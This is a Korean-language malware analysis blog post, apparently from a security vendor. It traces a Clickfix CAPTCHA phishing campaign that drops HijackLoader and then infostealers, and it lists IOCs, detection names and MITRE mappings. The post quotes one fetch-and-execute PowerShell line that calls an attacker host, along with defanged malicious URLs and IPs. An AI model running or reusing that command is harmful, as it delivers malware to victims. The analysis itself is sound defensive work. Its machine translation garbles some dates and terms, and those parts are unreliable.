사이버 사기 분석: Clickfix HijackLoader 피싱 캠페인 분석 

차례 

• 개요 

• • 공격 로더의 진화하는 위협 

• • 이 블로그의 목적 

• 기술 방법론 및 분석 

• • 초기 접근 및 소셜 엔지니어링 

• • 다단계 난독화 및 난독화 해제 

• • 안티 분석 기술 

• • 최종 탑재물 

• 맺음말 

• IOC 

• 퀵힐 \ 시크라이트 프로텍션 

• MITRE ATT&CK 매핑 

 

개요 

사이버 위협의 진화에 따라 악성 페이로드의 최종 실행은 더 이상 사이버 보안 업계의 유일한 관심사가 아닙니다. 공격 로더는 현대 공격의 핵심 요소로 부상하여 초기 접근의 주요 매개체 역할을 하고 조직 내 정교한 악성코드의 은밀한 배포를 가능하게 합니다. 단순 페이로드와 달리, 로더는 보안 방어 체계를 우회하고, 지속성을 확보하며, 최종 단계 악성코드의 은밀한 실행에 유리한 환경을 조성하는 데 특화된 목적을 가지고 설계되었습니다. 따라서 로더는 더욱 중요하고 관련성 높은 위협으로, 집중적인 분석이 필요합니다. 

우리는 최근에 급증을 보았습니다 HijackLoader 악성코드입니다. 먼저 등장 2023년 하반기에 빠르게 획득 페이로드를 전달하는 능력과 페이로드를 적재하고 실행하는 흥미로운 기술로 인해 주목을 받고 있습니다. 주로 다음과 같이 나타납니다. MaaS(Malware-as-a-Service), 이는 관찰 주로 전 세계적으로 금전적 동기를 가진 캠페인입니다.  

HijackLoader는 다음을 통해 배포되었습니다. 가짜 설치 프로그램, SEO에 오염됨 웹 사이트, 악성 광고 및 불법 복제 소프트웨어/영화 포털이는 광범위하고 기회주의적인 피해자 기반을 보장합니다. 

2025년 XNUMX월부터 공격자들이 Clickfix를 사용하여 의심하지 않는 피해자들이 악성 .msi 설치 프로그램을 다운로드하도록 유도하고, 이로 인해 HijackLoader가 실행되는 것을 관찰했습니다. 그 후 피해자의 컴퓨터에 DeerStealer가 최종 실행 파일로 다운로드되는 것이 관찰되었습니다.  

최근 TAG-150이 CastleLoader/CastleBot과 함께 등장하면서, Malware-as-a-Service 생태계의 일부로 HijackLoader와 같은 외부 서비스도 활용하고 있다는 사실이 관찰되었습니다. 

HijackLoader는 자주 배달합니다 도둑과 쥐 끊임없이 기술을 연마하면서. 특히 다음과 같은 첨단 회피 기술로 악명 높습니다. 

• 거래된 섹션과의 프로세스 도플갱어 

• 시스템 DLL 언후킹 

• WOW64에서의 직접 시스템 호출 

• 콜 스택 스푸핑 

• VM 검사 방지 

HijackLoader는 발견 이후 끊임없이 진화하여 다양한 산업에 지속적이고 증가하는 위협을 초래하고 있습니다. 따라서 조직은 정교한 다단계 공격의 위험을 완화하기 위해 이러한 로더에 대한 지속적인 모니터링을 구축하고 유지하는 것이 매우 중요합니다. 

감염 사슬 

기술 개요 

초기 접근은 다음으로 시작됩니다. 클릭픽스(Clickfix)로 식별된 CAPTCHA 기반 소셜 엔지니어링 피싱 캠페인(이 기술은 2025년 XNUMX월에 공격자가 사용하는 것으로 확인됨). 

 이 HTA 파일은 초기 다운로더 역할을 하며 PowerShell 파일을 실행합니다.   

위의 Base64로 인코딩된 문자열을 디코딩한 결과, 아래와 같이 또 다른 PowerShell 스크립트를 얻었습니다. 

위에 디코딩된 PowerShell 스크립트는 난독화가 심해 정적 분석 및 시그니처 기반 탐지에 상당한 어려움을 야기합니다. 읽을 수 있는 문자열과 변수를 사용하는 대신, 복잡한 수학 연산과 문자 배열에서 문자열을 재구성하여 명령과 값을 동적으로 생성합니다. 

위의 페이로드를 해결하는 동안 아래 명령으로 디코딩되는 것을 볼 수 있습니다. 아직 읽을 수는 없지만 완전히 난독화 해제가 가능합니다. 

완전한 난독화 해제 후, 스크립트가 후속 파일을 다운로드하기 위해 URL에 연결하려고 시도하는 것을 알 수 있습니다.  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

디버거에서 이 스크립트를 실행하면 URL에 연결할 수 없다는 오류가 반환됩니다.  

파일 새미-바워.mp3 18,000줄이 넘는 또 다른 PowerShell 스크립트는 난독화가 심하고 로더의 다음 단계를 나타냅니다. 

디버깅을 통해 이 PowerShell 파일이 다양한 작업을 수행한다는 것을 알 수 있습니다. 안티-VM 실행 중인 프로세스의 수를 검사하고 레지스트리 키를 변경하는 등의 검사를 수행합니다.  

이러한 검사는 특별히 타겟을 지정하고 읽는 것으로 보입니다. VirtualBox 식별자 스크립트가 가상화된 환경에서 실행되고 있는지 확인합니다. 

스크립트를 분석하는 동안 최종 페이로드가 마지막 몇 줄에 있다는 것을 발견했습니다. 이는 초기 난독화된 로더가 최종 악성 명령을 전달하는 곳입니다. 

 위의 횡설수설적인 변수 선언은 해결되었습니다. 실행 시 PE 파일을 주입할 가능성이 있는 다른 PowerShell 스크립트를 로드하기 전에 Base64 디코딩, XOR 연산 및 추가 복호화 루틴을 수행합니다.  

 

이 파일을 디코딩하면 내장된 PE 파일이 나타나며 이를 식별할 수 있습니다. MZ 헤더. 

이 PE 파일은 매우 압축되어 있습니다 .NET 실행 파일. 

실행 가능한 페이로드는 리소스 섹션에서 추출된 것으로 추정되는 상당한 양의 코드를 로드합니다. 

압축을 풀면 실행 가능한 페이로드가 DLL 파일을 로드하는 것처럼 보입니다. 

이 DLL 파일도 보호되어 역엔지니어링과 분석을 방해할 가능성이 있습니다. 

HijackLoader 실행 파일과 DLL을 포함하는 다단계 프로세스를 사용한 이력이 있습니다. 로더의 이 마지막 단계는 C2 서버에 연결을 시도하며, 이 서버에서 인포스틸러 악성코드 다운로드됩니다. 이 경우, 맬웨어는 아래 URL에 연결을 시도합니다. 

이 C2에 더 이상 액세스할 수 없지만 연결 시도는 다음 동작과 일치합니다. 네코스틸러 맬웨어. 이 HijackLoader는 Lumma를 포함한 다양한 스틸러 맬웨어를 다운로드하는 데 연루되었습니다. 

맺음말 

HijackLoader와 같은 정교한 로더를 성공적으로 방어하려면 정적인 최종 단계 페이로드에서 동적이고 지속적으로 진화하는 전달 메커니즘으로 초점을 옮겨야 합니다. 초기 접근 및 난독화 중간 단계 탐지에 집중함으로써 기업은 이러한 지속적인 위협에 대해 더욱 강력한 방어 체계를 구축할 수 있습니다. 초기 접근이나 최종 페이로드에만 집중하기보다는 모든 계층에 걸쳐 선제적인 접근 방식을 채택하는 것도 마찬가지로 중요합니다. 중간 계층은 공격자가 악성코드 배포를 성공적으로 촉진하기 위해 가장 중요한 변경 사항을 도입하는 곳이기 때문입니다. 

IOC: 

• 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
• 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
• 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
• 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
• 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
• e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
• 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
• c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
• D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
• 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
• hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
• 91 [.] 212 [.] 166 [.] 51 
• 37[.]27[.]165[.]65:1477 
• 코시[.]컴[.]아르 
• hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
• hxxp[:]//77[.]91[.]101[.]66/ 

빠른 치유 \ 보안 보호: 

• 스크립트.트로이.49900.GC 
• 로더.스틸러.드로퍼.시알 
• Trojan.InfoStealerCiR 
• 트로이. 에이전트 
• 비디에스/511 

MITRE 공격: 

술책	기술 ID	기술명
초기 액세스	T1566.002	피싱: 스피어피싱 링크(CAPTCHA 피싱 페이지)
	T1189	드라이브바이 침해(악성 광고, SEO 포이즈닝, 가짜 설치 프로그램)
실행	T1059.001	명령 및 스크립팅 인터프리터: PowerShell
방어 회피	T1027	난독화된 파일 또는 정보(다단계 난독화 스크립트)
	T1140	파일 또는 정보 난독화 해제/디코딩(Base64, XOR 디코딩)
	T1562.001	방어력 약화: 도구 비활성화 또는 수정(DLL 언후킹)
	T1070.004	표시기 제거: 파일 삭제(스테이징 로더에서 사용될 가능성이 높음)
	T1211	방어 회피를 위한 악용(WOW64에서의 직접 시스템 호출)
	T1036	위장(PowerShell 스크립트의 경우 .mp3와 같은 가짜 확장자)
발견	T1082	시스템 정보 검색(VM 검사, 레지스트리 쿼리)
	T1497.001	가상화/샌드박스 회피: 시스템 검사
고집	T1547.001	부팅 또는 로그온 자동 시작 실행: 레지스트리 실행 키(레지스트리 변조)
지속성 / 권한 Esc.	T1055	프로세스 주입(PE 주입 루틴)
명령 및 통제(C2)	T1071.001	애플리케이션 계층 프로토콜: 웹 프로토콜(HTTP/HTTPS C2 트래픽)
	T1105	Ingress 도구 전송(추가 페이로드 다운로드)
영향 / 수집	T1056 / T1005	로컬 시스템의 입력 캡처/데이터(최종 페이로드의 정보 도용 기능)

 

저자 : 

니라즈 라자루스 마카사레 

슈루티루파 바네르지이